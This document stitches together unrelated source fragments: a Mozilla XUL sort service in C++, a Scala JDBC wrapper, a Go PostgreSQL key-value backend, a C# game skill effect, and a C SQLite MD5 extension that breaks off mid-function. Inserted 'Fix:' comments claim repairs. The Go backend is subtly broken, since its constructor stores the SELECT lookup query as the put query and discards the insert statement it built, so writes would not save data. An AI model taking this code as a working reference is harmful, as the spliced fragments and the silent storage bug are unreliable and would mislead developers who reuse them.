sortState->sortKeys[t],
sortState->sortHints, &sortOrder);
if (sortOrder)
break;
}
else {
// no template, so just compare attributes. Ignore namespaces for now.
nsAutoString leftstr, rightstr;
left->content->GetAttr(kNameSpaceID_None, sortState->sortKeys[t], leftstr);
right->content->GetAttr(kNameSpaceID_None, sortState->sortKeys[t], rightstr);
sortOrder = XULSortServiceImpl::CompareValues(leftstr, rightstr, sortState->sortHints);
// Fix: stop at the first key that decides the comparison; without
// this break a later key silently overrode an earlier difference,
// breaking multi-key (sort="key1 key2") semantics.
if (sortOrder)
break;
}
}
}
if (sortState->direction == <API key>)
sortOrder = -sortOrder;
return sortOrder;
}
nsresult
XULSortServiceImpl::SortContainer(nsIContent *aContainer, nsSortState* aSortState)
{
// Sorts (or merely reverses, when only the direction changed) the children
// of aContainer according to aSortState, reinserts them in the new order,
// and recurses into nested <treechildren>/<menupopup> containers.
nsTArray<contentSortInfo> items;
nsresult rv = GetItemsToSort(aContainer, aSortState, items);
NS_ENSURE_SUCCESS(rv, rv);
uint32_t numResults = items.Length();
if (!numResults)
return NS_OK;
uint32_t i;
// <API key> sorts the items between separators independently
if (aSortState-><API key>) {
uint32_t startIndex = 0;
for (i = 0; i < numResults; i++) {
if (i > startIndex + 1) {
nsAutoString type;
// NOTE(review): items[i].result is only set for template-generated
// items (see GetItemsToSort); confirm it is non-null on this path.
items[i].result->GetType(type);
if (type.EqualsLiteral("separator")) {
// close off the segment that ends at this separator: invert it
// if only the direction flipped, otherwise quicksort it
if (aSortState->invertSort)
InvertSortInfo(items, startIndex, i - startIndex);
else
NS_QuickSort((void *)(items.Elements() + startIndex), i - startIndex,
sizeof(contentSortInfo), testSortCallback, (void*)aSortState);
startIndex = i + 1;
}
}
}
// handle the trailing segment after the last separator
if (i > startIndex + 1) {
if (aSortState->invertSort)
InvertSortInfo(items, startIndex, i - startIndex);
else
NS_QuickSort((void *)(items.Elements() + startIndex), i - startIndex,
sizeof(contentSortInfo), testSortCallback, (void*)aSortState);
}
} else {
// if the items are just being inverted, that is, just switching between
// ascending and descending, just reverse the list.
if (aSortState->invertSort)
InvertSortInfo(items, 0, numResults);
else
NS_QuickSort((void *)items.Elements(), numResults,
sizeof(contentSortInfo), testSortCallback, (void*)aSortState);
}
// first remove the items from the old positions
for (i = 0; i < numResults; i++) {
nsIContent* child = items[i].content;
nsIContent* parent = child->GetParent();
if (parent) {
// remember the parent so that it can be reinserted back
// into the same parent. This is necessary as multiple rules
// may generate results which get placed in different locations.
items[i].parent = parent;
int32_t index = parent->IndexOf(child);
parent->RemoveChildAt(index, true);
}
}
// now add the items back in sorted order
for (i = 0; i < numResults; i++)
{
nsIContent* child = items[i].content;
nsIContent* parent = items[i].parent;
if (parent) {
parent->AppendChildTo(child, true);
// if it's a container in a tree or menu, find its children,
// and sort those also
if (!child->AttrValueIs(kNameSpaceID_None, nsGkAtoms::container,
nsGkAtoms::_true, eCaseMatters))
continue;
for (nsIContent* grandchild = child->GetFirstChild();
grandchild;
grandchild = grandchild->GetNextSibling()) {
mozilla::dom::NodeInfo *ni = grandchild->NodeInfo();
nsIAtom *localName = ni->NameAtom();
if (ni->NamespaceID() == kNameSpaceID_XUL &&
(localName == nsGkAtoms::treechildren ||
localName == nsGkAtoms::menupopup)) {
SortContainer(grandchild, aSortState);
}
}
}
}
return NS_OK;
}
nsresult
XULSortServiceImpl::InvertSortInfo(nsTArray<contentSortInfo>& aData,
int32_t aStart, int32_t aNumItems)
{
// Reverses aNumItems elements of aData beginning at aStart by swapping
// pairs outward from the middle. Used when a sort merely flips direction,
// which is cheaper than re-sorting the whole range.
if (aNumItems > 1) {
// reverse the items in the array starting from aStart
int32_t upPoint = (aNumItems + 1) / 2 + aStart;
int32_t downPoint = (aNumItems - 2) / 2 + aStart;
int32_t half = aNumItems / 2;
// Fix: the loop condition was truncated to "while (half"; restore the
// countdown so exactly aNumItems/2 swaps are performed.
while (half-- > 0)
aData[downPoint--].swap(aData[upPoint++]);
}
return NS_OK;
}
nsresult
XULSortServiceImpl::InitializeSortState(nsIContent* aRootElement,
nsIContent* aContainer,
const nsAString& aSortKey,
const nsAString& aSortHints,
nsSortState* aSortState)
{
// Populates aSortState from the requested key and hint strings plus the
// sort-related attributes already on aRootElement (previous sort key,
// direction, separator and statics handling).
// used as an optimization for the content builder
if (aContainer != aSortState->lastContainer.get()) {
aSortState->lastContainer = aContainer;
aSortState->lastWasFirst = false;
aSortState->lastWasLast = false;
}
// The attributes allowed are either:
// sort="key1 key2 ..."
// or sortResource="key1" sortResource2="key2"
// The latter is for backwards compatibility, and is equivalent to concatenating
// both values in the sort attribute
nsAutoString sort(aSortKey);
aSortState->sortKeys.Clear();
if (sort.IsEmpty()) {
nsAutoString sortResource, sortResource2;
aRootElement->GetAttr(kNameSpaceID_None, nsGkAtoms::sortResource, sortResource);
if (!sortResource.IsEmpty()) {
nsCOMPtr<nsIAtom> sortkeyatom = NS_Atomize(sortResource);
aSortState->sortKeys.AppendObject(sortkeyatom);
sort.Append(sortResource);
aRootElement->GetAttr(kNameSpaceID_None, nsGkAtoms::sortResource2, sortResource2);
if (!sortResource2.IsEmpty()) {
nsCOMPtr<nsIAtom> sortkeyatom2 = NS_Atomize(sortResource2);
aSortState->sortKeys.AppendObject(sortkeyatom2);
sort.Append(' ');
sort.Append(sortResource2);
}
}
}
else {
// whitespace-separated key list from the sort attribute/argument
<API key> tokenizer(sort);
while (tokenizer.hasMoreTokens()) {
nsCOMPtr<nsIAtom> keyatom = NS_Atomize(tokenizer.nextToken());
NS_ENSURE_TRUE(keyatom, <API key>);
aSortState->sortKeys.AppendObject(keyatom);
}
}
aSortState->sort.Assign(sort);
aSortState->direction = nsSortState_natural;
bool noNaturalState = false;
// parse the hint list: comparison flags plus an optional direction
<API key> tokenizer(aSortHints);
while (tokenizer.hasMoreTokens()) {
const <API key>& token(tokenizer.nextToken());
if (token.EqualsLiteral("comparecase"))
aSortState->sortHints |= nsIXULSortService::SORT_COMPARECASE;
else if (token.EqualsLiteral("integer"))
aSortState->sortHints |= nsIXULSortService::SORT_INTEGER;
else if (token.EqualsLiteral("descending"))
aSortState->direction = <API key>;
else if (token.EqualsLiteral("ascending"))
aSortState->direction = <API key>;
else if (token.EqualsLiteral("twostate"))
noNaturalState = true;
}
// if the twostate flag was set, the natural order is skipped and only
// ascending and descending are allowed
if (aSortState->direction == nsSortState_natural && noNaturalState) {
aSortState->direction = <API key>;
}
// set up sort order info
aSortState->invertSort = false;
nsAutoString existingsort;
aRootElement->GetAttr(kNameSpaceID_None, nsGkAtoms::sort, existingsort);
nsAutoString <API key>;
aRootElement->GetAttr(kNameSpaceID_None, nsGkAtoms::sortDirection, <API key>);
// if just switching direction, set the invertSort flag
if (sort.Equals(existingsort)) {
if (aSortState->direction == <API key>) {
if (<API key>.EqualsLiteral("ascending"))
aSortState->invertSort = true;
}
else if (aSortState->direction == <API key> &&
<API key>.EqualsLiteral("descending")) {
aSortState->invertSort = true;
}
}
// sort items between separators independently
aSortState-><API key> =
aRootElement->AttrValueIs(kNameSpaceID_None, nsGkAtoms::sortSeparators,
nsGkAtoms::_true, eCaseMatters);
// sort static content (non template generated nodes) after generated content
aSortState->sortStaticsLast = aRootElement->AttrValueIs(kNameSpaceID_None,
nsGkAtoms::sortStaticsLast,
nsGkAtoms::_true, eCaseMatters);
aSortState->initialized = true;
return NS_OK;
}
int32_t
XULSortServiceImpl::CompareValues(const nsAString& aLeft,
const nsAString& aRight,
uint32_t aSortHints)
{
// Compares two attribute values per the sort hints: numeric compare when
// SORT_INTEGER is set and both values parse as integers, case-sensitive
// compare for SORT_COMPARECASE, otherwise a collation-based compare with
// a plain string compare as fallback.
if (aSortHints & SORT_INTEGER) {
nsresult err;
int32_t leftint = PromiseFlatString(aLeft).ToInteger(&err);
if (NS_SUCCEEDED(err)) {
int32_t rightint = PromiseFlatString(aRight).ToInteger(&err);
if (NS_SUCCEEDED(err)) {
// NOTE(review): the subtraction can overflow for extreme int32
// values; callers use only the sign, so confirm inputs are bounded.
return leftint - rightint;
}
}
// if they aren't integers, just fall through and compare strings
}
if (aSortHints & SORT_COMPARECASE) {
return ::Compare(aLeft, aRight);
}
nsICollation* collation = nsXULContentUtils::GetCollation();
if (collation) {
int32_t result;
collation->CompareString(nsICollation::<API key>,
aLeft, aRight, &result);
return result;
}
return ::Compare(aLeft, aRight, <API key>());
}
NS_IMETHODIMP
XULSortServiceImpl::Sort(nsIDOMNode* aNode,
const nsAString& aSortKey,
const nsAString& aSortHints)
{
// nsIXULSortService entry point: builds a sort state from the node's
// attributes and the supplied key/hints, records the state back on the
// node, then sorts the node's contents.
// get root content node
nsCOMPtr<nsIContent> sortNode = do_QueryInterface(aNode);
if (!sortNode)
return NS_ERROR_FAILURE;
nsSortState sortState;
nsresult rv = InitializeSortState(sortNode, sortNode,
aSortKey, aSortHints, &sortState);
NS_ENSURE_SUCCESS(rv, rv);
// store sort info in attributes on content
SetSortHints(sortNode, &sortState);
rv = SortContainer(sortNode, &sortState);
sortState.processor = nullptr; // don't hang on to this reference
return rv;
}
nsresult
<API key>(nsIXULSortService** sortService)
{
// Factory: constructs the sort service and hands the caller an owning
// (addref'd) reference via the out parameter.
*sortService = new XULSortServiceImpl();
NS_ADDREF(*sortService);
return NS_OK;
}
// v. 2.0. If a copy of the MPL was not distributed with this file, You can
package org.truffulatree.h2odb.sql
import java.sql.SQLException
import javax.sql.DataSource
import cats.Show
import cats.data.{NonEmptyList, State, Xor, XorT}
import cats.std.list._
// SQL: small functional wrappers for JDBC access built on cats.
// A Result is a stateful computation that either yields a value or
// accumulates a non-empty list of errors.
object SQL {
// All SQLExceptions collected during a computation.
type Exceptions = NonEmptyList[SQLException]
// A computation over state S that fails with NonEmptyList[A] or yields B.
type Result[S, A, B] = XorT[State[S, ?], NonEmptyList[A], B]
// Curried effectful function shapes used by the connection helpers.
type Fun1[S, A, B, C] = B => Result[S, A, C]
type Fun2[S, A, B, C, D] = B => C => Result[S, A, D]
// Evaluates 'a', converting a thrown SQLException into the domain error
// type via the implicit ErrorContext.
def catchEx[A, B](a: => A)(implicit B: ErrorContext[B]): Xor[NonEmptyList[B], A] =
Xor.catchOnly[SQLException](a).
leftMap(ex => NonEmptyList(B.fromSQLException(ex)))
// Acquires a connection from the data source, applies 'fn', and closes
// the connection when the resulting computation completes.
def withConnection[S, E, A](
dataSource: DataSource)(
fn: ConnectionRef[S, E] => Result[S, E, A])(
implicit EE: ErrorContext[E],
SE: Show[E]):
Result[S, E, A] = {
ConnectionRef[S, E](dataSource) flatMap { conn =>
conn.closeOnCompletion(fn(conn))
}
}
// Maps SQLExceptions into a domain-specific error type A.
trait ErrorContext[A] {
def fromSQLException(e: SQLException): A
def fromSQLExceptions(
es: NonEmptyList[SQLException]): NonEmptyList[A] =
es map fromSQLException
}
// A state computation that can be executed with a throwaway Unit state.
trait Runnable[A] {
protected def apply[S]: State[S, A]
def run: A =
apply[Unit].run(()).value._2
}
}
package physical
import (
"database/sql"
"fmt"
"strconv"
"strings"
"time"
"github.com/hashicorp/errwrap"
log "github.com/mgutz/logxi/v1"
"github.com/armon/go-metrics"
"github.com/lib/pq"
)
// PostgreSQL Backend is a physical backend that stores data
// within a PostgreSQL database.
type PostgreSQLBackend struct {
table string // quoted table identifier, safe to splice into SQL
client *sql.DB // shared connection pool
put_query string // insert-or-update statement chosen at setup time
get_query string // single value lookup by (path, key)
delete_query string // row removal by (path, key)
list_query string // direct keys plus immediate sub-prefixes of a path
logger log.Logger
permitPool *PermitPool // bounds concurrent DB operations (max_parallel)
}
// <API key> constructs a PostgreSQL backend using the given
// API client, server address, credentials, and database.
func <API key>(conf map[string]string, logger log.Logger) (Backend, error) {
// Get the PostgreSQL credentials to perform read/write operations.
connURL, ok := conf["connection_url"]
if !ok || connURL == "" {
return nil, fmt.Errorf("missing connection_url")
}
// The table name is configurable; quote it so a hostile configuration
// value cannot inject SQL.
unquoted_table, ok := conf["table"]
if !ok {
unquoted_table = "vault_kv_store"
}
quoted_table := pq.QuoteIdentifier(unquoted_table)
// max_parallel bounds concurrent DB operations and open connections.
maxParStr, ok := conf["max_parallel"]
var maxParInt int
var err error
if ok {
maxParInt, err = strconv.Atoi(maxParStr)
if err != nil {
return nil, errwrap.Wrapf("failed parsing max_parallel parameter: {{err}}", err)
}
if logger.IsDebug() {
logger.Debug("postgres: max_parallel set", "max_parallel", maxParInt)
}
} else {
maxParInt = <API key>
}
// Create PostgreSQL handle for the database.
db, err := sql.Open("postgres", connURL)
if err != nil {
return nil, fmt.Errorf("failed to connect to postgres: %v", err)
}
db.SetMaxOpenConns(maxParInt)
// Determine if we should use an upsert function (versions < 9.5)
var upsert_required bool
<API key> := "SELECT string_to_array(setting, '.')::int[] < '{9,5}' FROM pg_settings WHERE name = 'server_version'"
if err := db.QueryRow(<API key>).Scan(&upsert_required); err != nil {
// Fix: close the handle on this error path so it is not leaked.
db.Close()
return nil, fmt.Errorf("failed to check for native upsert: %v", err)
}
// Setup our put strategy based on the presence or absence of a native
// upsert.
var put_query string
if upsert_required {
// Pre-9.5 servers rely on a vault_kv_put() helper function being
// installed in the database.
put_query = "SELECT vault_kv_put($1, $2, $3, $4)"
} else {
put_query = "INSERT INTO " + quoted_table + " VALUES($1, $2, $3, $4)" +
" ON CONFLICT (path, key) DO " +
" UPDATE SET (parent_path, path, key, value) = ($1, $2, $3, $4)"
}
// Setup the backend.
m := &PostgreSQLBackend{
table: quoted_table,
client: db,
put_query: "SELECT value FROM " + quoted_table + " WHERE path = $1 AND key = $2",
get_query: "SELECT value FROM " + quoted_table + " WHERE path = $1 AND key = $2",
delete_query: "DELETE FROM " + quoted_table + " WHERE path = $1 AND key = $2",
// Fix: the previous concatenation produced "...path = $1UNION SELECT...",
// relying on the server's lexer to split the tokens; make the
// separation explicit with a space before UNION.
list_query: "SELECT key FROM " + quoted_table + " WHERE path = $1" +
" UNION SELECT DISTINCT substring(substr(path, length($1)+1) from '^.*?/') FROM " +
quoted_table + " WHERE parent_path LIKE $1 || '%'",
logger: logger,
permitPool: NewPermitPool(maxParInt),
}
return m, nil
}
// splitKey is a helper to split a full path key into individual
// parts: parentPath, path, key.
//
// The key is everything after the final slash; path and parentPath are
// the one- and two-level slash-delimited prefixes, each normalized to
// begin and end with "/".
func (m *PostgreSQLBackend) splitKey(fullPath string) (string, string, string) {
segments := strings.Split(fullPath, "/")
n := len(segments)
key := segments[n-1]
switch n {
case 1:
// bare key at the root: no parent, root path
return "", "/", key
case 2:
return "/", "/" + segments[0] + "/", key
default:
parent := "/" + strings.Join(segments[:n-2], "/") + "/"
path := "/" + strings.Join(segments[:n-1], "/") + "/"
return parent, path, key
}
}
// Put is used to insert or update an entry.
func (m *PostgreSQLBackend) Put(entry *Entry) error {
defer metrics.MeasureSince([]string{"postgres", "put"}, time.Now())
// Throttle through the permit pool so we never exceed max_parallel.
m.permitPool.Acquire()
defer m.permitPool.Release()
parentPath, path, key := m.splitKey(entry.Key)
// put_query is either a native upsert or the vault_kv_put() helper,
// selected when the backend was constructed.
_, err := m.client.Exec(m.put_query, parentPath, path, key, entry.Value)
return err
}
// Get is used to fetch an entry. A missing key is reported as
// (nil, nil) rather than as an error.
func (m *PostgreSQLBackend) Get(fullPath string) (*Entry, error) {
defer metrics.MeasureSince([]string{"postgres", "get"}, time.Now())
m.permitPool.Acquire()
defer m.permitPool.Release()
_, path, key := m.splitKey(fullPath)
var value []byte
switch err := m.client.QueryRow(m.get_query, path, key).Scan(&value); err {
case nil:
// found; fall through and build the entry
case sql.ErrNoRows:
// absent keys are not an error
return nil, nil
default:
return nil, err
}
return &Entry{
Key: key,
Value: value,
}, nil
}
// Delete is used to permanently delete an entry.
func (m *PostgreSQLBackend) Delete(fullPath string) error {
defer metrics.MeasureSince([]string{"postgres", "delete"}, time.Now())
m.permitPool.Acquire()
defer m.permitPool.Release()
// Deletion is keyed on (path, key); the parent path is not needed.
_, path, key := m.splitKey(fullPath)
_, err := m.client.Exec(m.delete_query, path, key)
return err
}
// List is used to list all the keys under a given
// prefix, up to the next prefix.
func (m *PostgreSQLBackend) List(prefix string) ([]string, error) {
defer metrics.MeasureSince([]string{"postgres", "list"}, time.Now())
m.permitPool.Acquire()
defer m.permitPool.Release()
rows, err := m.client.Query(m.list_query, "/"+prefix)
if err != nil {
return nil, err
}
defer rows.Close()
var keys []string
for rows.Next() {
var key string
err = rows.Scan(&key)
if err != nil {
return nil, fmt.Errorf("failed to scan rows: %v", err)
}
keys = append(keys, key)
}
return keys, nil
} |
using L2dotNET.GameService.Model.Player;
using L2dotNET.GameService.Network.Serverpackets;
using L2dotNET.GameService.World;
using L2dotNET.Utility;
namespace L2dotNET.GameService.Model.Skills2.Effects
{
    /// <summary>
    /// Skill effect that teleports the target to a named map region.
    /// Only the "hideout" region is currently handled; other region
    /// names fall through with no teleport.
    /// </summary>
    class ATeleRegion : Effect
    {
        // Region name parsed from the effect definition string.
        private string _region;

        // Parses the effect parameters; expects the region name as the
        // second space-separated token (e.g. "<effect> hideout").
        public override void Build(string str)
        {
            _region = str.Split(' ')[1];
        }

        public override EffectResult OnStart(L2Character caster, L2Character target)
        {
            int[] loc = null;
            if (_region.EqualsIgnoreCase("hideout"))
            {
                // NOTE(review): assumes target is an L2Player here — an
                // invalid cast would throw for non-player targets; confirm
                // callers only apply this effect to players.
                L2Player player = (L2Player)target;
                if ((player.ClanId > 0) && (player.Clan.HideoutId > 0))
                    loc = player.Clan.Hideout.ownerLoc;
            }
            // Fallback to the map-region respawn point is disabled.
            //if (loc == null) //ELFOC
            //    loc = MapRegionTable.getInstance().getRespawn(target.X, target.Y, ((L2Player)target).Karma);
            if (loc != null)
                target.Teleport(loc[0], loc[1], loc[2]);
            return Nothing;
        }

        // Teleport is blocked while the player carries a ward; a system
        // message is sent to explain the refusal.
        public override bool CanUse(L2Character caster)
        {
            L2Player player = (L2Player)caster;
            if (!player.IsWard())
                return true;
            caster.SendSystemMessage(SystemMessage.SystemMessageId.<API key>);
            return false;
        }
    }
}
/*
Maintained by Alexey Pechnikov (pechnikov@mobigroup.ru) and tested on linux only.
The code is public domain.
gcc -lm -fPIC -shared md5.c -o libsqlitemd5.so
.load './libsqlitemd5.so'
create table t1(x);
insert into t1 values (1);
insert into t1 values (2);
insert into t1 values (3);
select hex(group_md5(x)) from t1;
=> <API key>
select hex(md5(''));
=> <API key>
select hex(md5file('/tmp/agent_callbuilder.tcl'));
=> <API key>
*/
#if !defined(SQLITE_CORE) || defined(SQLITE_ENABLE_MD5)
#include <stdio.h>
#include <string.h>
#ifndef SQLITE_CORE
#include "sqlite3ext.h"
<API key>
#else
#include "sqlite3.h"
#endif
/*
* If compiled on a machine that doesn't have a 32-bit integer,
* you just set "uint32" to the appropriate datatype for an
* unsigned 32-bit integer. For example:
*
* cc -Duint32='unsigned long' md5.c
*
*/
#ifndef uint32
# define uint32 unsigned int
#endif
// identifier Context is used in SQLite code
struct Context2 {
  uint32 buf[4];         /* current MD5 state words (A, B, C, D) */
  uint32 bits[2];        /* 64-bit count of message bits: [0]=low, [1]=high */
  unsigned char in[64];  /* accumulation buffer for one 64-byte block */
};
/* Opaque storage for a struct Context2 (16 + 8 + 64 = 88 bytes). */
typedef char MD5Context[88];
/*
 * Reverse the byte order of `longs` consecutive 32-bit words in place,
 * so the MD5 core always sees little-endian word values.
 * Note: this code is harmless on little-endian machines.
 */
static void byteReverse (unsigned char *buf, unsigned longs){
  uint32 t;
  /* NOTE(review): the do/while assumes longs >= 1, and the uint32 store
  ** assumes buf is 4-byte aligned — both hold for the callers here. */
  do {
    t = (uint32)((unsigned)buf[3]<<8 | buf[2]) << 16 |
        ((unsigned)buf[1]<<8 | buf[0]);
    *(uint32 *)buf = t;
    buf += 4;
  } while (--longs);
}
/* The four core functions - F1 is optimized somewhat */
/* #define F1(x, y, z) (x & y | ~x & z) */
#define F1(x, y, z) (z ^ (x & (y ^ z)))
#define F2(x, y, z) F1(z, x, y)
#define F3(x, y, z) (x ^ y ^ z)
#define F4(x, y, z) (y ^ (x | ~z))

/* This is the central step in the MD5 algorithm:
** add the round function and data word, rotate left by s, add x. */
#define MD5STEP(f, w, x, y, z, data, s) \
  ( w += f(x, y, z) + data,  w = w<<s | w>>(32-s),  w += x )
/*
 * The core of the MD5 algorithm, this alters an existing MD5 hash to
 * reflect the addition of 16 longwords of new data. MD5Update blocks
 * the data and converts bytes into longwords for this routine.
 */
static void MD5Transform(uint32 buf[4], const uint32 in[16]){
  register uint32 a, b, c, d;

  a = buf[0];
  b = buf[1];
  c = buf[2];
  d = buf[3];

  /* Round 1: F1, shifts 7/12/17/22 */
  MD5STEP(F1, a, b, c, d, in[ 0]+0xd76aa478,  7);
  MD5STEP(F1, d, a, b, c, in[ 1]+0xe8c7b756, 12);
  MD5STEP(F1, c, d, a, b, in[ 2]+0x242070db, 17);
  MD5STEP(F1, b, c, d, a, in[ 3]+0xc1bdceee, 22);
  MD5STEP(F1, a, b, c, d, in[ 4]+0xf57c0faf,  7);
  MD5STEP(F1, d, a, b, c, in[ 5]+0x4787c62a, 12);
  MD5STEP(F1, c, d, a, b, in[ 6]+0xa8304613, 17);
  MD5STEP(F1, b, c, d, a, in[ 7]+0xfd469501, 22);
  MD5STEP(F1, a, b, c, d, in[ 8]+0x698098d8,  7);
  MD5STEP(F1, d, a, b, c, in[ 9]+0x8b44f7af, 12);
  MD5STEP(F1, c, d, a, b, in[10]+0xffff5bb1, 17);
  MD5STEP(F1, b, c, d, a, in[11]+0x895cd7be, 22);
  MD5STEP(F1, a, b, c, d, in[12]+0x6b901122,  7);
  MD5STEP(F1, d, a, b, c, in[13]+0xfd987193, 12);
  MD5STEP(F1, c, d, a, b, in[14]+0xa679438e, 17);
  MD5STEP(F1, b, c, d, a, in[15]+0x49b40821, 22);

  /* Round 2: F2, shifts 5/9/14/20 */
  MD5STEP(F2, a, b, c, d, in[ 1]+0xf61e2562,  5);
  MD5STEP(F2, d, a, b, c, in[ 6]+0xc040b340,  9);
  MD5STEP(F2, c, d, a, b, in[11]+0x265e5a51, 14);
  MD5STEP(F2, b, c, d, a, in[ 0]+0xe9b6c7aa, 20);
  MD5STEP(F2, a, b, c, d, in[ 5]+0xd62f105d,  5);
  MD5STEP(F2, d, a, b, c, in[10]+0x02441453,  9);
  MD5STEP(F2, c, d, a, b, in[15]+0xd8a1e681, 14);
  MD5STEP(F2, b, c, d, a, in[ 4]+0xe7d3fbc8, 20);
  MD5STEP(F2, a, b, c, d, in[ 9]+0x21e1cde6,  5);
  MD5STEP(F2, d, a, b, c, in[14]+0xc33707d6,  9);
  MD5STEP(F2, c, d, a, b, in[ 3]+0xf4d50d87, 14);
  MD5STEP(F2, b, c, d, a, in[ 8]+0x455a14ed, 20);
  MD5STEP(F2, a, b, c, d, in[13]+0xa9e3e905,  5);
  MD5STEP(F2, d, a, b, c, in[ 2]+0xfcefa3f8,  9);
  MD5STEP(F2, c, d, a, b, in[ 7]+0x676f02d9, 14);
  MD5STEP(F2, b, c, d, a, in[12]+0x8d2a4c8a, 20);

  /* Round 3: F3, shifts 4/11/16/23 */
  MD5STEP(F3, a, b, c, d, in[ 5]+0xfffa3942,  4);
  MD5STEP(F3, d, a, b, c, in[ 8]+0x8771f681, 11);
  MD5STEP(F3, c, d, a, b, in[11]+0x6d9d6122, 16);
  MD5STEP(F3, b, c, d, a, in[14]+0xfde5380c, 23);
  MD5STEP(F3, a, b, c, d, in[ 1]+0xa4beea44,  4);
  MD5STEP(F3, d, a, b, c, in[ 4]+0x4bdecfa9, 11);
  MD5STEP(F3, c, d, a, b, in[ 7]+0xf6bb4b60, 16);
  MD5STEP(F3, b, c, d, a, in[10]+0xbebfbc70, 23);
  MD5STEP(F3, a, b, c, d, in[13]+0x289b7ec6,  4);
  MD5STEP(F3, d, a, b, c, in[ 0]+0xeaa127fa, 11);
  MD5STEP(F3, c, d, a, b, in[ 3]+0xd4ef3085, 16);
  MD5STEP(F3, b, c, d, a, in[ 6]+0x04881d05, 23);
  MD5STEP(F3, a, b, c, d, in[ 9]+0xd9d4d039,  4);
  MD5STEP(F3, d, a, b, c, in[12]+0xe6db99e5, 11);
  MD5STEP(F3, c, d, a, b, in[15]+0x1fa27cf8, 16);
  MD5STEP(F3, b, c, d, a, in[ 2]+0xc4ac5665, 23);

  /* Round 4: F4, shifts 6/10/15/21 */
  MD5STEP(F4, a, b, c, d, in[ 0]+0xf4292244,  6);
  MD5STEP(F4, d, a, b, c, in[ 7]+0x432aff97, 10);
  MD5STEP(F4, c, d, a, b, in[14]+0xab9423a7, 15);
  MD5STEP(F4, b, c, d, a, in[ 5]+0xfc93a039, 21);
  MD5STEP(F4, a, b, c, d, in[12]+0x655b59c3,  6);
  MD5STEP(F4, d, a, b, c, in[ 3]+0x8f0ccc92, 10);
  MD5STEP(F4, c, d, a, b, in[10]+0xffeff47d, 15);
  MD5STEP(F4, b, c, d, a, in[ 1]+0x85845dd1, 21);
  MD5STEP(F4, a, b, c, d, in[ 8]+0x6fa87e4f,  6);
  MD5STEP(F4, d, a, b, c, in[15]+0xfe2ce6e0, 10);
  MD5STEP(F4, c, d, a, b, in[ 6]+0xa3014314, 15);
  MD5STEP(F4, b, c, d, a, in[13]+0x4e0811a1, 21);
  MD5STEP(F4, a, b, c, d, in[ 4]+0xf7537e82,  6);
  MD5STEP(F4, d, a, b, c, in[11]+0xbd3af235, 10);
  MD5STEP(F4, c, d, a, b, in[ 2]+0x2ad7d2bb, 15);
  MD5STEP(F4, b, c, d, a, in[ 9]+0xeb86d391, 21);

  /* Fold the round results back into the chaining state. */
  buf[0] += a;
  buf[1] += b;
  buf[2] += c;
  buf[3] += d;
}
/*
 * Start MD5 accumulation. Set bit count to 0 and buffer to mysterious
 * initialization constants.
 */
static void MD5Init(MD5Context *pCtx){
  struct Context2 *ctx = (struct Context2 *)pCtx;
  /* RFC 1321 initial chaining values A, B, C, D. */
  ctx->buf[0] = 0x67452301;
  ctx->buf[1] = 0xefcdab89;
  ctx->buf[2] = 0x98badcfe;
  ctx->buf[3] = 0x10325476;
  ctx->bits[0] = 0;
  ctx->bits[1] = 0;
}
/*
 * Update context to reflect the concatenation of another buffer full
 * of bytes.
 */
static
void MD5Update(MD5Context *pCtx, const unsigned char *buf, unsigned int len){
  struct Context2 *ctx = (struct Context2 *)pCtx;
  uint32 t;

  /* Update bitcount: add len*8 to the 64-bit counter, with carry. */
  t = ctx->bits[0];
  if ((ctx->bits[0] = t + ((uint32)len << 3)) < t)
    ctx->bits[1]++; /* Carry from low to high */
  ctx->bits[1] += len >> 29;

  t = (t >> 3) & 0x3f; /* Bytes already in shsInfo->data */

  /* Handle any leading odd-sized chunks: top up the partial block left
  ** over from the previous call, transforming it once full. */
  if ( t ) {
    unsigned char *p = (unsigned char *)ctx->in + t;
    t = 64-t;
    if (len < t) {
      memcpy(p, buf, len);
      return;
    }
    memcpy(p, buf, t);
    byteReverse(ctx->in, 16);
    MD5Transform(ctx->buf, (uint32 *)ctx->in);
    buf += t;
    len -= t;
  }

  /* Process data in 64-byte chunks */
  while (len >= 64) {
    memcpy(ctx->in, buf, 64);
    byteReverse(ctx->in, 16);
    MD5Transform(ctx->buf, (uint32 *)ctx->in);
    buf += 64;
    len -= 64;
  }

  /* Handle any remaining bytes of data; kept buffered until the next
  ** call or MD5Final. */
  memcpy(ctx->in, buf, len);
}
/*
 * Final wrapup - pad to 64-byte boundary with the bit pattern
 * 1 0* (64-bit count of bits processed, MSB-first), write the 16-byte
 * digest into `digest`, and scrub the context.
 */
static void MD5Final(unsigned char digest[16], MD5Context *pCtx){
  struct Context2 *ctx = (struct Context2 *)pCtx;
  unsigned count;
  unsigned char *p;

  /* Compute number of bytes mod 64 */
  count = (ctx->bits[0] >> 3) & 0x3F;

  /* Set the first char of padding to 0x80. This is safe since there is
     always at least one byte free */
  p = ctx->in + count;
  *p++ = 0x80;

  /* Bytes of padding needed to make 64 bytes */
  count = 64 - 1 - count;

  /* Pad out to 56 mod 64 */
  if (count < 8) {
    /* Two lots of padding: Pad the first block to 64 bytes */
    memset(p, 0, count);
    byteReverse(ctx->in, 16);
    MD5Transform(ctx->buf, (uint32 *)ctx->in);

    /* Now fill the next block with 56 bytes */
    memset(ctx->in, 0, 56);
  } else {
    /* Pad block to 56 bytes */
    memset(p, 0, count-8);
  }
  byteReverse(ctx->in, 14);

  /* Append length in bits and transform */
  ((uint32 *)ctx->in)[ 14 ] = ctx->bits[0];
  ((uint32 *)ctx->in)[ 15 ] = ctx->bits[1];

  MD5Transform(ctx->buf, (uint32 *)ctx->in);
  byteReverse((unsigned char *)ctx->buf, 4);
  memcpy(digest, ctx->buf, 16);
  /* BUG FIX: the original `memset(ctx, 0, sizeof(ctx))` only zeroed
  ** sizeof(pointer) bytes, leaving most of the (potentially sensitive)
  ** context intact. Zero the whole structure. */
  memset(ctx, 0, sizeof(*ctx)); /* In case it's sensitive */
}
/*
** During testing, the special md5sum() aggregate function is available.
** inside SQLite. The following routines implement that function.
**
** xStep for the group_md5() aggregate: feeds the blob value of every
** argument of every row into a running MD5 context.
*/
static void md5step(sqlite3_context *context, int argc, sqlite3_value **argv){
  MD5Context *p;
  int i;
  if( argc<1 ) return;
  /* Per-aggregate scratch space; presumably zero-filled on the first
  ** call so the ==1 check below initializes exactly once — TODO confirm
  ** against the SQLite aggregate-context API. */
  p = <API key>(context, sizeof(*p));
  if( p==0 ) return;
  if( <API key>(context)==1 ){
    MD5Init(p);
  }
  for(i=0; i<argc; i++){
    const char *zData = (char*)sqlite3_value_blob(argv[i]);
    if( zData ){
      /* Hash the full blob length, not just up to the first NUL. */
